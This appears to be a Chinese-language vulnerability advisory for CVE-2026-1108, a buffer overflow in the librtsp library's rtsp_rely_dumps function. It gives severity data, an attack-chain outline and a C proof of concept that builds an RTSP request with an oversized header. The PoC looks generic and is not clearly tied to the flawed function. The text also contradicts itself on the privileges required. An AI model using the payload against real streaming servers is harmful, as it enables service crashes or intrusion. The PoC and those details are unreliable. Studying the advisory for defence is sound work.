CVE-2026-1108: cijliu librtsp rtsp_rely_dumps函数缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-1108

漏洞类型

缓冲区溢出

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

cijliu librtsp

漏洞概述

CVE-2026-1108是cijliu librtsp库中的一个安全漏洞，该漏洞存在于rtsp_rely_dumps函数中，攻击者可通过构造恶意的RTSP协议数据触发缓冲区溢出。该漏洞影响版本至commit 2ec1a81ad65280568a0c7c16420d7c10fde13b04。攻击者需要本地访问权限且具有低权限即可利用此漏洞，无需用户交互。成功利用可导致机密性、完整性和可用性方面的低级别影响。cijliu librtsp是一个开源的RTSP协议实现库，常用于流媒体传输相关应用。由于该产品采用滚动发布模式，因此没有明确的版本号标识。受影响的供应商在收到漏洞通知后未做出任何回应，建议用户关注官方更新并采取相应的安全防护措施。此漏洞的CVSS 3.1评分为5.3，属于中等严重程度，攻击复杂度低，无需特殊权限即可实施攻击。

技术细节

该漏洞位于cijliu librtsp库的rtsp_rely_dumps函数中，是一个典型的缓冲区溢出问题。攻击者通过构造包含超长字段的RTSP协议数据包，当数据包经过rtsp_rely_dumps函数处理时，由于缺乏适当的边界检查，导致数据写入超出预定缓冲区的边界。在RTSP协议中，rtsp_rely_dumps函数负责解析和处理RTSP中继相关的数据结构，当处理RTSP请求或响应中的特定字段时，如果输入数据长度超过函数分配的缓冲区大小，就会发生缓冲区溢出。攻击者可以利用此漏洞覆写相邻内存区域，可能导致程序崩溃或执行任意代码。漏洞的利用需要攻击者具备本地访问权限，但不需要高级权限，这降低了利用门槛。由于该库常用于流媒体服务器和视频监控系统中，漏洞的利用可能影响大量依赖该库的应用。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的本地访问权限，准备恶意RTSP数据包

STEP 2

步骤2

攻击者构造包含超长字段的恶意RTSP协议数据包，字段长度超出rtsp_rely_dumps函数分配的缓冲区大小

STEP 3

步骤3

将恶意数据包发送到使用cijliu librtsp库的应用，该应用在处理RTSP中继数据时调用rtsp_rely_dumps函数

STEP 4

步骤4

rtsp_rely_dumps函数在处理超长数据时缺乏边界检查，导致缓冲区溢出

STEP 5

步骤5

攻击者可利用溢出的数据覆写相邻内存区域，实现代码执行或导致服务崩溃

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-1108 PoC - librtsp rtsp_rely_dumps Buffer Overflow
// Target: cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// Malicious RTSP packet that triggers buffer overflow in rtsp_rely_dumps
void create_malicious_rtsp_packet(char *buffer, size_t buf_size) {
    // Craft RTSP DESCRIBE request with oversized field
    const char *malicious_payload = 
        "DESCRIBE rtsp://target/stream RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "User-Agent: PoC-Client\r\n"
        "X-Rely-Data: ";
    
    // Fill with overflow data (exceeds buffer limit)
    char overflow_data[2048];
    memset(overflow_data, 'A', sizeof(overflow_data) - 1);
    overflow_data[sizeof(overflow_data) - 1] = '\0';
    
    snprintf(buffer, buf_size, "%s%s\r\n\r\n", malicious_payload, overflow_data);
}

int main() {
    printf("CVE-2026-1108 PoC - librtsp rtsp_rely_dumps Buffer Overflow\n");
    printf("This PoC demonstrates the buffer overflow in rtsp_rely_dumps function\n");
    printf("Target: cijliu librtsp <= 2ec1a81ad65280568a0c7c16420d7c10fde13b04\n\n");
    
    char packet[4096];
    create_malicious_rtsp_packet(packet, sizeof(packet));
    
    printf("Generated malicious RTSP packet:\n");
    printf("Length: %zu bytes\n", strlen(packet));
    printf("Packet contains %zu bytes of overflow data\n", strlen(packet) - 200);
    
    // In real exploitation, this packet would be sent to target
    // The vulnerable rtsp_rely_dumps function would process it
    
    return 0;
}

影响范围

cijliu librtsp <= 2ec1a81ad65280568a0c7c16420d7c10fde13b04

防御指南

临时缓解措施

在官方修复发布前，建议限制对使用cijliu librtsp库应用的访问权限，确保只有授权用户能够访问相关服务。同时可考虑在应用层实现输入数据长度限制，对所有RTSP协议字段进行严格的合法性验证。对于必须暴露的服务，建议部署入侵检测系统监控异常流量模式，并密切关注官方安全公告以获取最新修复信息。